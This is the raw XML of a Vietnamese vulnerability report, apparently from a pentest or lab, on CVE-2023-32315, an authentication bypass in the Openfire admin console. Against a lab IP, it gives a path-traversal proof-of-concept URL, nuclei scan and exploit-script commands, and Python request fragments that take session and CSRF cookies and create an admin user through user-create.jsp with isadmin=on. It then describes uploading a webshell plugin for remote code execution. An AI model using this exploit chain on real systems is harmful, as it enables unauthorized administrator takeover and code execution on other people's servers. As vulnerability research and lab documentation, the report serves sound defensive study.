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CVE-2023-32315 - ADMIN CONSOLE AUTH BYPASS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Loại lỗ hổng (RCE, LFI, XSS ....)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Path Traversal Attack có thể dẫn đến RCE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 Phiên bản ảnh hưởng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15367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OpenFire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vi-VN" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> phiên bản từ 3.10.0 đến trước 4.6.8; từ 4.7.0 đến trước 4.7.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LO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 Ý tưởng khai thác chính</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Sử dụng Path traversal Attack truy cập vào các trang bị hạn chế trong bảng điều khiển quản trị của người dùng quản trị, trong đó có tạo người dùng mới - với vai trò quản trị viên.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/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Đăng nhập vào tài khoản quản trị viên, sau đó tải lên plugin Openfire độc hại kích hoạt RCE.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4.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vi-VN" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>POC, Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>URL POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Nếu truy vấn vào URL thấy xuất hiện log của hệ thống thì chứng tỏ hệ thống có khả năng khai thác Path traversal </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://192.168.56.7:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:ind w:left="14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29210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1"/>
          <w:numId w:val="6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vi-VN" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Sodan query: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Sử dụng nuclei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vi-VN" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:ind w:left="1440" w:hanging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nuclei -l ./nuclei-targets.txt -t ./nuclei-CVE-2023-32315.yaml -o targets.txt -nm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"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Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"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-l ./nuclei-targets.txt  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>là list các máy chủ (VD http://192.168.56.7:9090)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"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-t ./nuclei-CVE-2023-32315.yaml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>là file template của nuclei</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"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42424"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F9" w:val="clear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  <w:shd w:fill="F9F9F9" w:val="clear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shd w:fill="F9F9F9" w:val="clear"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>5. Mã khai thác</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LO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shd w:fill="F9F9F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9F9F9" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
        <w:t>mã khai thác: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i/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F9" w:val="clear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shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 CVE-2023-32315.py -t http://192.168.56.7:9090 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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F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9F9F9" w:val="clear"/>
        </w:rPr>
        <w:t>hoặc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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F9" w:val="clear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shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 CVE-2023-32315.py -l lists.txt </w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
        <w:t>(với list.txt là danh sách các target)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shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="14097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shd w:fill="F9F9F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9F9F9" w:val="clear"/>
        </w:rPr>
        <w:t>Đăng nhập với tài khoản vừa tạo, sau đó tải lên plugin webshell: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shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="29210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shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2921000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shd w:fill="F9F9F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9F9F9" w:val="clear"/>
        </w:rPr>
        <w:t>Sử dụng Plugin vừa tải lên để tiếp tục khai thác hệ thống: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color w:val="242424"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="292100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color w:val="242424"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="242424"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr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color w:val="242424"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:fill="F9F9F9" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2921000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ind w:left="0"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*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vi-VN" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Các bước khai thác</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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B1: Lấy cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"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"JSESSIONID={jsessionid}; csrf={csrf}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bằng cách sử dụng lỗ hổng Path traversal qua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http://&lt;IP&gt;:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:hanging="360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Set url và header cho request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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url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target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/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:hanging="360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sine" w:cs="Cousine" w:ascii="Cousine" w:hAnsi="Cousine"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># Gửi request và lấy jsessionid và csrf từ Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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hack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http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url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headers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headers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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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jsessionid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.cookies.get(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'JSESSIONID'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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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csrf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.cookies.get(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'csrf'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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:hanging="0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/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B2: Sử dụng cookie để thêm người dùng quản trị viên sử dụng lỗ hổng Path traversal qua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http://&lt;IP&gt;:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:hanging="360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Set Url và header cho request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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header2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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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"Cookie"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"JSESSIONID=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jsessionid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; csrf=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csrf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LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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create_user_url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target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/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=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csrf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&amp;username=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username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&amp;name=&amp;email=&amp;password=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password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&amp;passwordConfirm=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password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&amp;isadmin=on&amp;create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:hanging="360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sine" w:cs="Cousine" w:ascii="Cousine" w:hAnsi="Cousine"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># Gửi request tạo người dùng mới</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LOnormal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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hhh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hack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http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create_user_url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headers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header2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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:fill="1E1E1E"/>
        <w:spacing w:lineRule="auto" w:line="324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sine">
    <w:altName w:val="Courier New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vi-V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vi-V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192.168.56.7:9090/setup/setup-s/%25u002e%25u002e/%25u002e%25u002e/log.jsp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5</Pages>
  <Words>350</Words>
  <Characters>2044</Characters>
  <CharactersWithSpaces>2412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2023-12-14T21:17:56Z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